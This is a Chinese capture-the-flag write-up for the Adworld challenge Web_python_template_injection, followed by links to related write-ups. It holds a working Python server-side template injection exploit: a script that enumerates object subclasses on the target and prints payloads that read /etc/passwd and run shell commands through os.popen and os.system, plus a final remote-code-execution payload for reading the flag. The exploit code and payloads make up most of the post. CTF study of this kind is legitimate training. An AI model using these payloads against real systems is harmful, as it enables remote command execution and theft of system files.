2. 程式人生 > 其它 >攻防世界-web:Web_python_template_injection

攻防世界-web:Web_python_template_injection

阿新 發佈:2021-11-03

題目描述

暫無

題目截圖

解題思路

題目提示是python模板注入
嘗試訪問不存在路徑,看看404頁面

將不存在路徑進行模板注入測試
構造如下:
http://111.200.241.244:59411/{{1+1}}

可以發現成功執行了1+1的運算結果,存在模板注入點。
直接編寫Python指令碼,探測可執行命令Payload

#coding:utf8

import requests
import re
import html

url = "http://111.200.241.244:59411/{{%s}}"

def GetRes(payload):
    try:
        t = requests.get(url%(payload)).text
        reg = '111.200.241.244:59411/(.+?) not found'
        return [html.unescape(i) for i in re.findall(reg,t)]
    except:
        return []
def TestObj():
    m = [{"name":'[]',"key":[]},{"name":'()',"key":()},{"name":'""',"key":""},{"name":'\'\'',"key":''},{"name":'{}',"key":{}}]
    pay = [".__class__.__base__",".__class__.__mro__[1]",".__class__.__mro__[2]"]
    for i in m:
        for j in pay:
            p = GetRes(i["name"]+j+'.__name__')
            for k in p:
                if k == 'object':
                    s = GetRes(i["name"]+j+'.__subclasses__()')
                    s = s[0].split(',')
                    for g in range(len(s)):
                        if '\'file\'' in s[g]:
                            print(i["name"]+j+'.__subclasses__()[%s]'%(g)+'(\'/etc/passwd\').read()')
                        q = GetRes(i["name"]+j+'.__subclasses__()[%s].__init__'%(g))
                        for t in q:
                            if '_Printer' in t:
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].system(\'whoami\')')
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].popen(\'whoami\').read()')
                            if 'Quitter' in t:
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].system(\'whoami\')')
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.__globals__[\'os\'].popen(\'whoami\').read()')
                            if 'func_globals' in t:
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals.linecache.os.popen(\'id\').read()')
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals[\'linecache\'].os.popen(\'whoami\').read()')
                                print(i["name"]+j+'.__subclasses__()[%s].__init__'%(g)+'.func_globals[\'linecache\'].__dict__[\'o\'+\'s\'].__dict__[\'sy\'+\'stem\'](\'ls\')')
TestObj()

執行結果如下:

隨便找一個Payload進行命令執行,這裡利用下面Payload

[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen('whoami').read()

將whoami改成其它命令即可。

列目錄:

發現了flag檔案
讀取flag

提交得分

相關推薦

攻防世界-webWeb_python_template_injection

題目描述 暫無 題目截圖 解題思路 題目提示是python模板注入 嘗試訪問不存在路徑,看看404頁面

攻防世界-webwarmup

題目描述 暫無 題目截圖 解題思路 訪問標題連結,發現圖片是個大大笑臉。直接看原始碼。

攻防世界-webPHP2

題目描述 暫無 題目截圖 只提示了一句話Can you anthenticate to this website? 估計是讓認證繞過,登入網站。

攻防世界-webunserialize3

題目描述 暫無 題目截圖 根據題目名稱,應該就是php反序列化。 解題思路 class xctf

攻防世界新手區 | when_did_you_born

checksec檢視程式型別 有Canary,先看看程式邏輯 [*] \'/home/zowie/Downloads/when_did_you_born\'

攻防世界新手區 | guess number

checksec程式資訊 Arch:amd64-64-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:PIE enabled

攻防世界新手區 | int_overflow

checksec: Arch:i386-32-little RELRO:Partial RELRO Stack:No canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界新手區 | strings

checksec: Arch:amd64-64-little RELRO:Full RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x400000) IDA:

攻防世界新手區 | CGfsb

checksec Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界進階區 | stack2

checksec Arch:i386-32-little RELRO:Partial RELRO Stack:Canary found NX:NX enabled PIE:No PIE (0x8048000)

攻防世界web進階(一)

1.PHP_python_template_injection 1.題目提示python模板注入,測試http://220.249.52.133:47149/{{7+7}},發現回顯“URL http://220.249.52.133:47149/14 not found”,說明括號裡的程式碼被執行了,存在SSTI。

攻防世界進階區 | Mary_Morton

這道題讓我重新學了一遍格式化字串漏洞,自學真的太頂了。 checksec開啟了canary

攻防世界新手區 | CRYPTO

在正式做題前先要大致瞭解一下CRYPTO 0x1: base64 將文字內容如題解密 Y3liZXJwZWFjZXtXZWxjb21lX3RvX25ld19Xb3JsZCF9

攻防世界進階區 | warmup

這道題感覺有點怪怪的,題目頁面並沒有給出附件,實驗了下可以開啟線上場景

攻防世界 - Web進階(二)

supersqli (!!!) 1.判斷有誤注入,1\'報錯, 1’ 報錯,1’# 正常且為True,1’ and 1=1# 正常且為True,1’ and 1=2# 正常且為False,所以它裡邊存在注入。

攻防世界-web-unfinish(sql二次注入)

題目來源網鼎杯 2018題目描述SQL 題目如下,是個登入頁面 通過awvs掃描得知存在register.php註冊頁面,並且註冊介面存在SQL盲注漏洞。

攻防世界-web-php_rce(ThinkPHP 5.0命令執行漏洞)

本題進入場景後顯示如下頁面 這是一個 thinkphp 框架,先檢視版本號。在網址上隨意輸入一個不存在的模組 地址

攻防世界-web-ics-07(PHP弱型別、linux目錄結構特性繞過檔案型別過濾)

工控雲管理系統專案管理頁面解析漏洞。 進入題目後,點選進入專案管理頁面。

攻防世界-web-Web_php_wrong_nginx_config(繞過登入、目錄瀏覽、後門利用)

進入場景後,提示需要登入 嘗試開啟robots.txt頁面,發現2個隱藏頁面hint.php和Hack.php

攻防世界-web-comment(密碼爆破、.git洩漏、程式碼審計、sql二次注入)

題目來源網鼎杯 2018題目描述SQL 一、密碼爆破 進入場景後,點擊發帖,輸入內容提交後,系統返回登入頁面